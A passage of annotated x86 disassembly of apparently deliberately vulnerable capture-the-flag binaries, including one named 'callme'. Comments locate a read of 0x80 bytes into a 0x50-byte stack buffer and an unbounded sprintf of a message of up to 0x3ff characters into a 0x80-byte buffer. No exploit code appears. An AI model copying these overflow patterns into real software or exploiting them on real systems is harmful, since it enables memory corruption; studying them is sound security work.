237 | 804867e: c1 e0 1f shl $0x1f,%eax 238 | 8048681: 29 d0 sub %edx,%eax 239 | 8048683: 29 c1 sub %eax,%ecx 240 | 8048685: 89 c8 mov %ecx,%eax 241 | 8048687: 89 45 dc mov %eax,-0x24(%ebp) 242 | 804868a: 83 45 d8 01 addl $0x1,-0x28(%ebp) 243 | 804868e: 83 7d d8 0f cmpl $0xf,-0x28(%ebp) 244 | 8048692: 7e b3 jle 8048647 245 | 8048694: 8b 45 e0 mov -0x20(%ebp),%eax 246 | 8048697: 89 04 24 mov %eax,(%esp) 247 | 804869a: e8 41 fe ff ff call 80484e0 248 | 804869f: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 249 | 80486a6: 00 250 | 80486a7: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 251 | 
80486ae: 00
252 | 80486af: 8d 45 e4 lea -0x1c(%ebp),%eax
253 | 80486b2: 89 04 24 mov %eax,(%esp)
254 | 80486b5: e8 06 fe ff ff call 80484c0 # args (-0x1c(%ebp), 0, 0x10); symbol name missing from this listing, presumably memset() clearing the 16-byte buffer read earlier - confirm
255 | 80486ba: 8b 45 dc mov -0x24(%ebp),%eax
256 | 80486bd: 89 04 24 mov %eax,(%esp)
257 | 80486c0: e8 cb fd ff ff call 8048490 # receives the value accumulated in -0x24(%ebp); symbol name missing, presumably a PRNG seed call - confirm
258 | 80486c5: 8b 45 f4 mov -0xc(%ebp),%eax
259 | 80486c8: 65 33 05 14 00 00 00 xor %gs:0x14,%eax # stack canary check before return
260 | 80486cf: 74 05 je 80486d6
261 | 80486d1: e8 8a fd ff ff call 8048460 <__stack_chk_fail@plt>
262 | 80486d6: c9 leave
263 | 80486d7: c3 ret
264 |
265 | 080486d8 : # helper: takes one pointer argument and forwards it with a fixed length of 0x80
266 | 80486d8: 55 push %ebp
267 | 80486d9: 89 e5 mov %esp,%ebp
268 | 80486db: 83 ec 18 sub $0x18,%esp
269 | 80486de: c7 44 24 08 80 00 00 movl $0x80,0x8(%esp) # 3rd arg: fixed length 0x80 (128), independent of the caller's buffer size
270 | 80486e5: 00
271 | 80486e6: 8b 45 08 mov 0x8(%ebp),%eax
272 | 80486e9: 89 44 24 04 mov %eax,0x4(%esp) # 2nd arg: the caller's buffer pointer
273 | 80486ed: c7 04 24 00 00 00 00 movl $0x0,(%esp) # 1st arg: 0
274 | 80486f4: e8 37 fd ff ff call 8048430 # symbol name missing; (0, buf, 0x80) is consistent with read() from stdin - confirm. The result is returned to the caller unchanged
275 | 80486f9: c9 leave
276 | 80486fa: c3 ret
277 |
278 | 080486fb : # address pushed by _start as the first argument of __libc_start_main, i.e. main
279 | 80486fb: 55 push %ebp
280 | 80486fc: 89 e5 mov %esp,%ebp
281 | 80486fe: 53 push %ebx
282 | 80486ff: 83 e4 f0 and $0xfffffff0,%esp
283 | 8048702: 83 c4 80 add $0xffffff80,%esp # reserve 0x80 bytes of locals
284 | 8048705: 65 a1 14 00 00 00 mov %gs:0x14,%eax
285 | 804870b: 89 44 24 7c mov %eax,0x7c(%esp) # stack canary slot at 0x7c(%esp)
286 | 804870f: 31 c0 xor %eax,%eax
287 | 8048711: c7 04 24 1e 00 00 00 movl $0x1e,(%esp)
288 | 8048718: e8 33 fd ff ff call 8048450 # argument 0x1e (30); symbol name missing, presumably alarm() - confirm
289 | 804871d: e8 cb fe ff ff call 80485ed # the function defined at 080485ed
290 | 8048722: 8d 44 24 2c lea 0x2c(%esp),%eax # buffer starts at 0x2c(%esp), i.e. 0x50 bytes below the canary slot
291 | 8048726: 89 04 24 mov %eax,(%esp)
292 | 8048729: e8 aa ff ff ff call 80486d8 # the helper requests up to 0x80 bytes into this 0x50-byte region; the length should be capped at the buffer size
293 | 804872e: 89 44 24 20 mov %eax,0x20(%esp) # returned count; used below as loop bound and output length, a negative (error) return is not handled separately
294 | 8048732: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp) # i = 0
295 | 8048739: 00
296 | 804873a: eb 55 jmp 8048791
297 | 804873c: e8 8f fd ff ff call 80484d0 # no arguments; symbol name missing, presumably rand() - confirm
298 | 8048741: 8b 54 24 1c mov 0x1c(%esp),%edx
299 | 8048745: 8d 4a 01 lea 0x1(%edx),%ecx
300 | 8048748: 99 cltd
301 | 8048749: f7 f9 idiv %ecx # edx = result % (i + 1)
302 | 804874b: 89 54 24 24 mov %edx,0x24(%esp) # j
303 | 804874f: 8d 54 24 2c lea 0x2c(%esp),%edx
304 | 8048753: 8b 44 24 1c mov 0x1c(%esp),%eax
305 | 8048757: 01 d0 add %edx,%eax
306 | 8048759: 0f b6 00 movzbl (%eax),%eax
307 | 804875c: 0f be c0 movsbl %al,%eax
308 | 804875f: 89 44 24 28 mov %eax,0x28(%esp) # tmp = buf[i] (sign-extended)
309 | 8048763: 8d 54 24 2c lea 0x2c(%esp),%edx
310 | 8048767: 8b 44 24 24 mov 0x24(%esp),%eax
311 | 804876b: 01 d0 add %edx,%eax
312 | 804876d: 0f b6 00 movzbl (%eax),%eax
313 | 8048770: 8d 4c 24 2c lea 0x2c(%esp),%ecx
314 | 8048774: 8b 54 24 1c mov 0x1c(%esp),%edx
315 | 8048778: 01 ca add %ecx,%edx
316 | 804877a: 88 02 mov %al,(%edx) # buf[i] = buf[j]
317 | 804877c: 8b 44 24 28 mov 0x28(%esp),%eax
318 | 8048780: 8d 4c 24 2c lea 0x2c(%esp),%ecx
319 | 8048784: 8b 54 24 24 mov 0x24(%esp),%edx
320 | 8048788: 01 ca add %ecx,%edx
321 | 804878a: 88 02 mov %al,(%edx) # buf[j] = tmp
322 | 804878c: 83 44 24 1c 01 addl $0x1,0x1c(%esp)
323 | 8048791: 8b 44 24 1c mov 0x1c(%esp),%eax
324 | 8048795: 3b 44 24 20 cmp 0x20(%esp),%eax
325 | 8048799: 7c a1 jl 804873c # signed compare: loop while i < count
326 | 804879b: 8b 44 24 20 mov 0x20(%esp),%eax
327 | 804879f: 89 44 24 08 mov %eax,0x8(%esp)
328 | 80487a3: 8d 44 24 2c lea 0x2c(%esp),%eax
329 | 80487a7: 89 44 24 04 mov %eax,0x4(%esp)
330 | 80487ab: c7 04 24 01 00 00 00 movl $0x1,(%esp)
331 | 80487b2: e8 f9 fc ff ff call 80484b0 # args (1, buf, count); symbol name missing, presumably write() to stdout - confirm
332 | 80487b7: b8 00 00 00 00 mov $0x0,%eax
333 | 80487bc: 8b 5c 24 7c mov 0x7c(%esp),%ebx
334 | 80487c0: 65 33 1d 14 00 00 00 xor %gs:0x14,%ebx # stack canary check before return
335 | 80487c7: 74 05 je 80487ce
336 | 80487c9: e8 92 fc ff ff call 8048460 <__stack_chk_fail@plt>
337 | 80487ce: 8b 5d fc mov -0x4(%ebp),%ebx
338 | 80487d1: c9 leave
339 | 80487d2: c3 ret
340 | 80487d3: 66 90 xchg %ax,%ax
341 | 80487d5: 66 90 xchg %ax,%ax
342 | 80487d7: 66 90 xchg %ax,%ax
343 | 80487d9: 66 90 xchg %ax,%ax
344 | 80487db: 66 90 xchg %ax,%ax
345 | 80487dd: 66 90 xchg %ax,%ax
346 | 80487df: 90 nop
347 |
348 | 080487e0 <__libc_csu_init>:
349 | 80487e0: 55 push %ebp
350 | 80487e1: 57 push %edi
351 | 80487e2: 31 ff xor %edi,%edi
352 | 80487e4: 56 push %esi
353 | 80487e5: 53 push %ebx
354 | 80487e6: e8 35 fd ff ff call 8048520 <__x86.get_pc_thunk.bx>
355 | 80487eb: 81 c3 15 18 00 00 add $0x1815,%ebx
356 | 80487f1: 83 ec 1c sub $0x1c,%esp
357 | 80487f4: 8b 6c 24 30 mov 0x30(%esp),%ebp
358 | 80487f8: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi
359 | 80487fe: e8 ed fb ff ff call 80483f0 <_init>
360 | 8048803: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax
361 | 8048809: 29 c6 sub %eax,%esi
362 | 804880b: c1 fe 02 sar $0x2,%esi
363 | 804880e: 85 f6 test %esi,%esi
364 | 8048810: 74 27 je 8048839 <__libc_csu_init+0x59>
365 | 8048812: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
366 | 8048818: 8b 44 24 38 mov 0x38(%esp),%eax
367 | 804881c: 89 2c 24 mov %ebp,(%esp)
368 | 804881f: 89 44 24 08 mov %eax,0x8(%esp)
369 | 8048823: 8b 44 24 34 mov 0x34(%esp),%eax
370 | 8048827: 89 44 24 04 mov %eax,0x4(%esp)
371 | 804882b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4)
372 | 8048832: 83 c7 01 add $0x1,%edi
373 | 8048835: 39 f7 cmp %esi,%edi
374 | 8048837: 75 df jne 8048818 <__libc_csu_init+0x38>
375 |
8048839: 83 c4 1c add $0x1c,%esp 376 | 804883c: 5b pop %ebx 377 | 804883d: 5e pop %esi 378 | 804883e: 5f pop %edi 379 | 804883f: 5d pop %ebp 380 | 8048840: c3 ret 381 | 8048841: eb 0d jmp 8048850 <__libc_csu_fini> 382 | 8048843: 90 nop 383 | 8048844: 90 nop 384 | 8048845: 90 nop 385 | 8048846: 90 nop 386 | 8048847: 90 nop 387 | 8048848: 90 nop 388 | 8048849: 90 nop 389 | 804884a: 90 nop 390 | 804884b: 90 nop 391 | 804884c: 90 nop 392 | 804884d: 90 nop 393 | 804884e: 90 nop 394 | 804884f: 90 nop 395 | 396 | 08048850 <__libc_csu_fini>: 397 | 8048850: f3 c3 repz ret 398 | 399 | Disassembly of section .fini: 400 | 401 | 08048854 <_fini>: 402 | 8048854: 53 push %ebx 403 | 8048855: 83 ec 08 sub $0x8,%esp 404 | 8048858: e8 c3 fc ff ff call 8048520 <__x86.get_pc_thunk.bx> 405 | 804885d: 81 c3 a3 17 00 00 add $0x17a3,%ebx 406 | 8048863: 83 c4 08 add $0x8,%esp 407 | 8048866: 5b pop %ebx 408 | 8048867: c3 ret 409 | -------------------------------------------------------------------------------- /callme.txt: -------------------------------------------------------------------------------- 1 | 2 | callme-69d26b77eb41e4eeba1d7b8402a8b165: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0804839c <.init>: 8 | 804839c: 53 push %ebx 9 | 804839d: 83 ec 08 sub $0x8,%esp 10 | 80483a0: e8 eb 00 00 00 call 8048490 11 | 80483a5: 81 c3 5b 1c 00 00 add $0x1c5b,%ebx 12 | 80483ab: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 80483b1: 85 c0 test %eax,%eax 14 | 80483b3: 74 05 je 80483ba 15 | 80483b5: e8 56 00 00 00 call 8048410 <__gmon_start__@plt> 16 | 80483ba: 83 c4 08 add $0x8,%esp 17 | 80483bd: 5b pop %ebx 18 | 80483be: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 080483c0 : 23 | 80483c0: ff 35 04 a0 04 08 pushl 0x804a004 24 | 80483c6: ff 25 08 a0 04 08 jmp *0x804a008 25 | 80483cc: 00 00 add %al,(%eax) 26 | ... 
27 | 28 | 080483d0 : 29 | 80483d0: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 80483d6: 68 00 00 00 00 push $0x0 31 | 80483db: e9 e0 ff ff ff jmp 80483c0 32 | 33 | 080483e0 : 34 | 80483e0: ff 25 10 a0 04 08 jmp *0x804a010 35 | 80483e6: 68 08 00 00 00 push $0x8 36 | 80483eb: e9 d0 ff ff ff jmp 80483c0 37 | 38 | 080483f0 : 39 | 80483f0: ff 25 14 a0 04 08 jmp *0x804a014 40 | 80483f6: 68 10 00 00 00 push $0x10 41 | 80483fb: e9 c0 ff ff ff jmp 80483c0 42 | 43 | 08048400 <__stack_chk_fail@plt>: 44 | 8048400: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048406: 68 18 00 00 00 push $0x18 46 | 804840b: e9 b0 ff ff ff jmp 80483c0 47 | 48 | 08048410 <__gmon_start__@plt>: 49 | 8048410: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048416: 68 20 00 00 00 push $0x20 51 | 804841b: e9 a0 ff ff ff jmp 80483c0 52 | 53 | 08048420 : 54 | 8048420: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048426: 68 28 00 00 00 push $0x28 56 | 804842b: e9 90 ff ff ff jmp 80483c0 57 | 58 | 08048430 : 59 | 8048430: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048436: 68 30 00 00 00 push $0x30 61 | 804843b: e9 80 ff ff ff jmp 80483c0 62 | 63 | 08048440 <__libc_start_main@plt>: 64 | 8048440: ff 25 28 a0 04 08 jmp *0x804a028 65 | 8048446: 68 38 00 00 00 push $0x38 66 | 804844b: e9 70 ff ff ff jmp 80483c0 67 | 68 | 08048450 : 69 | 8048450: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 8048456: 68 40 00 00 00 push $0x40 71 | 804845b: e9 60 ff ff ff jmp 80483c0 72 | 73 | Disassembly of section .text: 74 | 75 | 08048460 <.text>: 76 | _start 77 | 8048460: 31 ed xor %ebp,%ebp 78 | 8048462: 5e pop %esi 79 | 8048463: 89 e1 mov %esp,%ecx 80 | 8048465: 83 e4 f0 and $0xfffffff0,%esp 81 | 8048468: 50 push %eax 82 | 8048469: 54 push %esp 83 | 804846a: 52 push %edx 84 | 804846b: 68 80 88 04 08 push $0x8048880 85 | 8048470: 68 10 88 04 08 push $0x8048810 86 | 8048475: 51 push %ecx 87 | 8048476: 56 push %esi 88 | 8048477: 68 00 87 04 08 push $0x8048700 89 | 804847c: e8 bf ff ff ff call 8048440 <__libc_start_main@plt> 90 | 8048481: f4 hlt 91 | 8048482: 66 90 
xchg %ax,%ax 92 | 8048484: 66 90 xchg %ax,%ax 93 | 8048486: 66 90 xchg %ax,%ax 94 | 8048488: 66 90 xchg %ax,%ax 95 | 804848a: 66 90 xchg %ax,%ax 96 | 804848c: 66 90 xchg %ax,%ax 97 | 804848e: 66 90 xchg %ax,%ax 98 | 99 | thunk.bx 100 | 8048490: 8b 1c 24 mov (%esp),%ebx 101 | 8048493: c3 ret 102 | 8048494: 66 90 xchg %ax,%ax 103 | 8048496: 66 90 xchg %ax,%ax 104 | 8048498: 66 90 xchg %ax,%ax 105 | 804849a: 66 90 xchg %ax,%ax 106 | 804849c: 66 90 xchg %ax,%ax 107 | 804849e: 66 90 xchg %ax,%ax 108 | 109 | deregister_tm_clones 110 | 80484a0: b8 3b a0 04 08 mov $0x804a03b,%eax 111 | 80484a5: 2d 38 a0 04 08 sub $0x804a038,%eax 112 | 80484aa: 83 f8 06 cmp $0x6,%eax 113 | 80484ad: 77 01 ja 80484b0 114 | 80484af: c3 ret 115 | 80484b0: b8 00 00 00 00 mov $0x0,%eax 116 | 80484b5: 85 c0 test %eax,%eax 117 | 80484b7: 74 f6 je 80484af 118 | 80484b9: 55 push %ebp 119 | 80484ba: 89 e5 mov %esp,%ebp 120 | 80484bc: 83 ec 18 sub $0x18,%esp 121 | 80484bf: c7 04 24 38 a0 04 08 movl $0x804a038,(%esp) 122 | 80484c6: ff d0 call *%eax 123 | 80484c8: c9 leave 124 | 80484c9: c3 ret 125 | 80484ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 126 | 127 | register_tm_clones 128 | 80484d0: b8 38 a0 04 08 mov $0x804a038,%eax 129 | 80484d5: 2d 38 a0 04 08 sub $0x804a038,%eax 130 | 80484da: c1 f8 02 sar $0x2,%eax 131 | 80484dd: 89 c2 mov %eax,%edx 132 | 80484df: c1 ea 1f shr $0x1f,%edx 133 | 80484e2: 01 d0 add %edx,%eax 134 | 80484e4: d1 f8 sar %eax 135 | 80484e6: 75 01 jne 80484e9 136 | 80484e8: c3 ret 137 | 80484e9: ba 00 00 00 00 mov $0x0,%edx 138 | 80484ee: 85 d2 test %edx,%edx 139 | 80484f0: 74 f6 je 80484e8 140 | 80484f2: 55 push %ebp 141 | 80484f3: 89 e5 mov %esp,%ebp 142 | 80484f5: 83 ec 18 sub $0x18,%esp 143 | 80484f8: 89 44 24 04 mov %eax,0x4(%esp) 144 | 80484fc: c7 04 24 38 a0 04 08 movl $0x804a038,(%esp) 145 | 8048503: ff d2 call *%edx 146 | 8048505: c9 leave 147 | 8048506: c3 ret 148 | 8048507: 89 f6 mov %esi,%esi 149 | 8048509: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 150 | 151 | 
__do_global_dtors_aux
152 | 8048510: 80 3d 40 a0 04 08 00 cmpb $0x0,0x804a040
153 | 8048517: 75 13 jne 804852c
154 | 8048519: 55 push %ebp
155 | 804851a: 89 e5 mov %esp,%ebp
156 | 804851c: 83 ec 08 sub $0x8,%esp
157 | 804851f: e8 7c ff ff ff call 80484a0
158 | 8048524: c6 05 40 a0 04 08 01 movb $0x1,0x804a040
159 | 804852b: c9 leave
160 | 804852c: f3 c3 repz ret
161 | 804852e: 66 90 xchg %ax,%ax
162 |
163 | frame_dummy:
164 | 8048530: a1 10 9f 04 08 mov 0x8049f10,%eax
165 | 8048535: 85 c0 test %eax,%eax
166 | 8048537: 74 1f je 8048558
167 | 8048539: b8 00 00 00 00 mov $0x0,%eax
168 | 804853e: 85 c0 test %eax,%eax
169 | 8048540: 74 16 je 8048558
170 | 8048542: 55 push %ebp
171 | 8048543: 89 e5 mov %esp,%ebp
172 | 8048545: 83 ec 18 sub $0x18,%esp
173 | 8048548: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp)
174 | 804854f: ff d0 call *%eax
175 | 8048551: c9 leave
176 | 8048552: e9 79 ff ff ff jmp 80484d0
177 | 8048557: 90 nop
178 | 8048558: e9 73 ff ff ff jmp 80484d0
179 |
180 | show_msg(const char* time_str, const char* fmt): ; formats into a 0x80-byte stack buffer, then passes it to print()
181 | 804855d: 55 push %ebp
182 | 804855e: 89 e5 mov %esp,%ebp
183 | 8048560: 81 ec b8 00 00 00 sub $0xb8,%esp
184 | 8048566: 8b 45 08 mov 0x8(%ebp),%eax
185 | 8048569: 89 85 64 ff ff ff mov %eax,-0x9c(%ebp) ; time_str
186 | 804856f: 8b 45 0c mov 0xc(%ebp),%eax
187 | 8048572: 89 85 60 ff ff ff mov %eax,-0xa0(%ebp) ; fmt
188 | 8048578: 65 a1 14 00 00 00 mov %gs:0x14,%eax
189 | 804857e: 89 45 f4 mov %eax,-0xc(%ebp) ; stack canary slot at -0xc(%ebp)
190 | 8048581: 31 c0 xor %eax,%eax
191 | 8048583: c7 44 24 0c 60 a0 04 movl $0x804a060,0xc(%esp) ; 4th arg: global buffer at 0x804a060, the one record_msg() fills via readline(…, 0x400)
192 | 804858a: 08
193 | 804858b: 8b 85 64 ff ff ff mov -0x9c(%ebp),%eax
194 | 8048591: 89 44 24 08 mov %eax,0x8(%esp) ; 3rd arg: time_str
195 | 8048595: 8b 85 60 ff ff ff mov -0xa0(%ebp),%eax
196 | 804859b: 89 44 24 04 mov %eax,0x4(%esp) ; 2nd arg: fmt
197 | 804859f: 8d 85 74 ff ff ff lea -0x8c(%ebp),%eax ; 1st arg: destination, 0x80 bytes below the canary slot
198 | 80485a5: 89 04 24 mov %eax,(%esp)
199 | 80485a8: e8 a3 fe ff ff call 8048450 ; symbol name missing from this listing; (dest, fmt, time_str, msg) is consistent with sprintf() - confirm. No size bound is passed while the message buffer can hold up to 0x3ff characters, so the output can exceed the 0x80-byte dest; a length-bounded formatter sized to dest would close this
200 | 80485ad: 8d 85 74 ff ff ff lea -0x8c(%ebp),%eax
201 | 80485b3: 89 04 24 mov %eax,(%esp)
202 | 80485b6: e8 29 02 00 00 call 80487e4 ; print(dest)
203 | 80485bb: 8b 45 f4 mov -0xc(%ebp),%eax
204 | 80485be: 65 33 05 14 00 00 00 xor %gs:0x14,%eax ; stack canary check before return
205 | 80485c5: 74 05 je 80485cc
206 | 80485c7: e8 34 fe ff ff call 8048400 <__stack_chk_fail@plt>
207 | 80485cc: c9 leave
208 | 80485cd: c3 ret
209 |
210 | show(): ; builds two format templates on the stack, formats the current time, then calls show_msg() with one of the templates
211 | 80485ce: 55 push %ebp
212 | 80485cf: 89 e5 mov %esp,%ebp
213 | 80485d1: 81 ec 98 00 00 00 sub $0x98,%esp
214 | 80485d7: 65 a1 14 00 00 00 mov %gs:0x14,%eax
215 | 80485dd: 89 45 f4 mov %eax,-0xc(%ebp) ; stack canary slot at -0xc(%ebp)
216 | 80485e0: 31 c0 xor %eax,%eax
217 | 80485e2: c7 45 84 20 20 20 20 movl $0x20202020,-0x7c(%ebp) ; four spaces: first template starts at -0x7c(%ebp)
218 | 80485e9: c7 45 88 20 20 20 20 movl $0x20202020,-0x78(%ebp) ; four more spaces
219 | 80485f0: c7 45 8c 20 25 32 24 movl $0x24322520,-0x74(%ebp) ; ' %2$'
220 | 80485f7: c7 45 90 73 0a 00 00 movl $0xa73,-0x70(%ebp) ; 's', '\n', then NUL bytes
221 | 80485fe: c7 45 94 25 73 25 73 movl $0x73257325,-0x6c(%ebp) ; '%s%s': second template starts at -0x6c(%ebp)
222 | 8048605: c7 45 98 0a 00 00 00 movl $0xa,-0x68(%ebp) ; '\n', then NUL bytes
223 | 804860c: c7 45 9c 00 00 00 00 movl $0x0,-0x64(%ebp)
224 | 8048613: c7 45 a0 00 00 00 00 movl $0x0,-0x60(%ebp)
225 | 804861a: 8d 85 7c ff ff ff lea -0x84(%ebp),%eax ; time_t*
226 | 8048620: 89 04 24 mov %eax,(%esp)
227 | 8048623: e8 a8 fd ff ff call 80483d0 ; symbol name missing, presumably time() - confirm
228 | 8048628: 8d 85 7c ff ff ff lea -0x84(%ebp),%eax ; time_t*
229 | 804862e: 89 04 24 mov %eax,(%esp)
230 | 8048631: e8 fa fd ff ff call 8048430 ; symbol name missing, presumably localtime() - confirm
231 | 8048636: 89 45 80 mov %eax,-0x80(%ebp) ; struct tm
232 | 8048639: 8b 45 80 mov -0x80(%ebp),%eax
233 | 804863c: 89 44 24 0c mov %eax,0xc(%esp) ; 4th (tm)
234 | 8048640: c7 44 24 08 a0 88 04 movl $0x80488a0,0x8(%esp) ; 3rd (fmt)
235 | 8048647: 08
236 | 8048648: c7 44 24 04 50 00 00 movl $0x50,0x4(%esp) ; 2nd (max)
237 | 804864f: 00
238 | 8048650: 8d 45 a4 lea -0x5c(%ebp),%eax
239 | 8048653: 89 04 24 mov %eax,(%esp) ; 1st (out)
240 | 8048656: e8 c5 fd ff ff call 8048420 ; symbol name missing; (out, 0x50, fmt, tm) matches strftime() - confirm. out is -0x5c(%ebp), 0x50 bytes below the canary slot, so the max agrees with the buffer
241 | 804865b: 8b 95 7c ff ff ff mov -0x84(%ebp),%edx
242 | 8048661: a1 44 a0 04 08 mov 0x804a044,%eax ; prev
243 | 8048666: 39 c2 cmp %eax,%edx
244 | 8048668: 74 22 je 804868c ; same timestamp as the previous message -> same_time
245 |
246 | 804866a: 8b 85 7c ff ff ff mov -0x84(%ebp),%eax
247 | 8048670: a3 44 a0 04 08 mov %eax,0x804a044 ; remember this timestamp for the next call
248 | 8048675: 8d 45 84 lea -0x7c(%ebp),%eax ; "%s%s\n"
249 | 8048678: 83 c0 10 add $0x10,%eax ; -0x7c + 0x10 = -0x6c(%ebp), the second template
250 | 804867b: 89 44 24 04 mov %eax,0x4(%esp)
251 | 804867f: 8d 45 a4 lea -0x5c(%ebp),%eax
252 | 8048682: 89 04 24 mov %eax,(%esp)
253 | 8048685: e8 d3 fe ff ff call 804855d ; show_msg(time_str, fmt)
254 | 804868a: eb 12 jmp 804869e
255 | same_time:
256 | 804868c: 8d 45 84 lea -0x7c(%ebp),%eax ; " %2$s\n"
257 | 804868f: 89 44 24 04 mov %eax,0x4(%esp)
258 | 8048693: 8d 45 a4 lea -0x5c(%ebp),%eax
259 | 8048696: 89 04 24 mov %eax,(%esp)
260 | 8048699: e8 bf fe ff ff call 804855d ; show_msg(time_str, fmt)
261 | done:
262 | 804869e: 8b 45 f4 mov -0xc(%ebp),%eax
263 | 80486a1: 65 33 05 14 00 00 00 xor %gs:0x14,%eax ; stack canary check before return
264 | 80486a8: 74 05 je 80486af
265 | 80486aa: e8 51 fd ff ff call 8048400 <__stack_chk_fail@plt>
266 | 80486af: c9 leave
267 | 80486b0: c3 ret
268 |
269 |
270 | record_msg(): ; reads lines into the global buffer at 0x804a060 and shows each one until a line equal to "END" arrives
271 | 80486b1: 55 push %ebp
272 | 80486b2: 89 e5 mov %esp,%ebp
273 | 80486b4: 83 ec 18 sub $0x18,%esp
274 |
275 | loop:
276 | 80486b7: c7 44 24 04 00 04 00 movl $0x400,0x4(%esp) ; size argument 0x400
277 | 80486be: 00
278 | 80486bf: c7 04 24 60 a0 04 08 movl $0x804a060,(%esp)
279 | 80486c6: e8 e5 00 00 00 call 80487b0 ; readline(0x804a060, 0x400)
280 |
281 | 80486cb: 0f b6 05 60 a0 04 08 movzbl 0x804a060,%eax
282 | 80486d2: 3c 45 cmp $0x45,%al ; 'E'
283 | 80486d4: 75 21 jne 80486f7
284 | 80486d6: 0f b6 05 61 a0 04 08 movzbl 0x804a061,%eax
285 | 80486dd: 3c 4e cmp $0x4e,%al ; 'N'
286 | 80486df: 75 16 jne 80486f7
287 | 80486e1: 0f b6 05 62 a0 04 08 movzbl 0x804a062,%eax
288 | 80486e8: 3c 44 cmp $0x44,%al ; 'D'
289 | 80486ea: 75 0b jne 80486f7
290 | 80486ec: 0f b6 05 63 a0 04 08 movzbl 0x804a063,%eax
291 | 80486f3: 84 c0 test %al,%al ; terminating NUL: the line must be exactly "END"
292 | 80486f5: 74 07 je 80486fe
293 |
294 | record:
295 | 80486f7: e8 d2 fe ff ff call 80485ce ; show()
296 | 80486fc: eb b9 jmp 80486b7
297 |
298 | done:
299 | 80486fe: c9 leave
300 | 80486ff: c3 ret
301 |
302 | main():
303 | 8048700: 55 push %ebp
304 | 8048701: 89 e5 mov %esp,%ebp
305 | 8048703: 83 e4 f0 and $0xfffffff0,%esp
306 | 8048706: 83 ec 20 sub $0x20,%esp
307 | 8048709: 65 a1 14 00 00 00 mov %gs:0x14,%eax
308 | 804870f: 89 44 24 1c mov %eax,0x1c(%esp) ; stack canary slot at 0x1c(%esp)
309 | 8048713: 31 c0 xor %eax,%eax
310 | 8048715: c7 04 24 1e 00 00 00 movl $0x1e,(%esp)
311 | 804871c: e8 cf fc ff ff call 80483f0 ; argument 0x1e (30); symbol name missing, presumably alarm() - confirm
312 | 8048721: c7 44 24 14 00 00 00 movl $0x0,0x14(%esp) ; counter = 0
313 | 8048728: 00
314 |
315 | sleep_loop:
316 | 8048729: eb 1d jmp 8048748
317 | 804872b: c7 04 24 aa 88 04 08 movl $0x80488aa,(%esp)
318 | 8048732: e8 ad 00 00 00 call 80487e4 ; print()
319 | 8048737: c7 04 24 01 00 00 00 movl $0x1,(%esp)
320 | 804873e: e8 9d fc ff ff call 80483e0 ; argument 1; symbol name missing, presumably sleep() as the label above suggests - confirm
321 | 8048743: 83 44 24 14 01 addl $0x1,0x14(%esp)
322 | 8048748: 83 7c 24 14 02 cmpl $0x2,0x14(%esp)
323 | 804874d: 7e dc jle 804872b ; counter runs 0..2, three iterations
324 |
325 | 804874f: c7 04 24 ac 88 04 08 movl $0x80488ac,(%esp)
326 | 8048756: e8 89 00 00 00 call 80487e4 ; Sorry
327 | 804875b: c7 04 24 e4 88 04 08 movl $0x80488e4,(%esp)
328 | 8048762: e8 7d 00 00 00 call 80487e4 ; Msg?
329 |
330 | 8048767: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp) ; size argument 4
331 | 804876e: 00
332 | 804876f: 8d 44 24 18 lea 0x18(%esp),%eax ; 4-byte buffer directly below the canary slot
333 | 8048773: 89 04 24 mov %eax,(%esp)
334 | 8048776: e8 35 00 00 00 call 80487b0 ; readline(buf, 4): stores at most 3 bytes plus a NUL, which fits the 4 bytes available
335 |
336 | 804877b: 0f b6 44 24 18 movzbl 0x18(%esp),%eax
337 | 8048780: 3c 79 cmp $0x79,%al ; 'y'
338 | 8048782: 75 07 jne 804878b
339 | 8048784: e8 28 ff ff ff call 80486b1 ; record_msg()
340 | 8048789: eb 0c jmp 8048797
341 |
342 | 804878b: c7 04 24 0b 89 04 08 movl $0x804890b,(%esp)
343 | 8048792: e8 4d 00 00 00 call 80487e4 ; Bye
344 | 8048797: 8b 54 24 1c mov 0x1c(%esp),%edx
345 | 804879b: 65 33 15 14 00 00 00 xor %gs:0x14,%edx ; stack canary check before return
346 | 80487a2: 74 05 je 80487a9
347 | 80487a4: e8 57 fc ff ff call 8048400 <__stack_chk_fail@plt>
348 | 80487a9: c9 leave
349 | 80487aa: c3 ret
350 |
351 | 80487ab: 66 90 xchg %ax,%ax
352 | 80487ad: 66 90 xchg %ax,%ax
353 | 80487af: 90 nop
354 |
355 | readline(): ; readline(buf, size): reads one byte per syscall until newline or size-1 bytes, then NUL-terminates
356 | 80487b0: 53 push %ebx
357 | 80487b1: 51 push %ecx
358 | 80487b2: 52 push %edx
359 | 80487b3: 56 push %esi
360 | 80487b4: bb 00 00 00 00 mov $0x0,%ebx ; fd 0
361 | 80487b9: 8b 4c 24 14 mov 0x14(%esp),%ecx ; 1st arg: buffer pointer
362 | 80487bd: ba 01 00 00 00 mov $0x1,%edx ; count 1
363 | 80487c2: 8b 74 24 18 mov 0x18(%esp),%esi ; 2nd arg: size
364 | loop:
365 | 80487c6: 83 ee 01 sub $0x1,%esi ; decrement first, so at most size-1 bytes are stored; a size of 0 would wrap around (both callers in this listing pass constants, 0x400 and 4)
366 | 80487c9: 74 11 je 80487dc
367 | 80487cb: b8 03 00 00 00 mov $0x3,%eax ; i386 Linux syscall number 3 = read
368 | 80487d0: cd 80 int $0x80 ; read(0, ecx, 1); the return value in eax is never examined, so EOF or an error is treated like a successful read
